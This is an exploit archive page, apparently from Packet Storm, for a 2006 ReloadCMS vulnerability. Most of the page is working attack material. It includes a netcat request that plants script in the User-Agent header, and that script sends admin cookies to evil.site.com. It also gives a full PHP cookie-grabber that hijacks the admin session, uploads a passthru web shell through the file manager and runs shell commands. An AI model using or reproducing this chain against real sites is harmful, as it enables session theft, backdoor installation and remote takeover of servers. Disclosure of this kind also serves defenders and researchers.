what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ReloadCMS-1.2.5.txt

ReloadCMS-1.2.5.txt
Posted Apr 11, 2006
Authored by rgod | Site retrogod.altervista.org

ReloadCMS versions less than 1.2.5 do not properly sanitize the user-agent request header before storing in stats.dat leading to XSS when the admin views the site statistics. Permissions can be escalated further ones logged in as admin.

tags | exploit
SHA-256 | 191369e980daf69a88a2bc929a6f7b30484c78f2eb5396c3405bc91a8954e92b

ReloadCMS-1.2.5.txt

Change Mirror Download
<?php
/*
ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution

software site: http://reloadcms.com/
description: "ReloadCMS is a free CMS written on PHP and based on flat files."

vulnerability:
ReloadCMS do not properly sanitize User-Agent request header before to store it
in stats.dat file.
Example of attack, through netcat:

rgod>nc target.host.com 80
GET /path_to_reloadcms/ HTTP/1.0
User-Agent: "><script>window.open("http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL);window.close();</script>
Host: target.host.com
Connection: Close

So, when admin see site statistics through the administration panel, javascript
will run

Once grab.php script captures admin cookie, the script itself can upload a shell
trough file manager, launch commands and write output to a logfile also, inside
cookies, there is admin MD5 password hash

rgod
mail: rgod@autistici.org
site: http://retrogod.altervista.org
*/

#--------------------------------grab.php---------------------------------------
#cookie grabber / backdoor install

$cmd="uname -a"; //a shell command, leave empty to lauch commands later through suntzu.php
$proxy=""; //you can use a proxy (ip:port), otherwise leave empty
$logfile="log.txt";
$filename="suntzu.php"; //shell filename

error_reporting(0);
ignore_user_abort(1);
ini_set("max_execution_time",0);

//log referer and cookies
$fp=fopen($logfile,"a");
fputs($fp,$_GET['ref']."|".$_GET['c']."\r\n");

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}

$temp=explode("/",$_GET['ref']);
$host=$temp[2];
$path="";
if (count($temp)>4)
{
for ($i=3; $i<=count($temp)-2; $i++)
{$path.="/".$temp[$i];}
}
$path.="/";
$port=80;

#step 1 -> Get full application path, it is inside html, you need this to upload a shell
$packet ="GET ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$_GET[c].";\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

#step 2 -> Upload the evil code
$temp=explode('name="path" value="',$html);
$temp2=explode("\"",$temp[1]);
$fullpath=$temp2[0];
$shell='<?php error_reporting(0);ini_set("max_execution_time",0);if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}passthru($_GET[cmd]);?>';
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"path\"\r\n\r\n";
$data.="$fullpath\r\n";
$data.="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"test\"\r\n\r\n";
$data.="Upload\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$_GET[c].";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

#step 3 -> launch commands
$packet ="GET ".$path."suntzu.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

//log output
fputs($fp,"suntzu>".$cmd."\r\n");
fputs($fp,"\r\n".$html."\r\n");
fclose($fp);
header ("Location: ".$_GET['ref']);
?>




Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close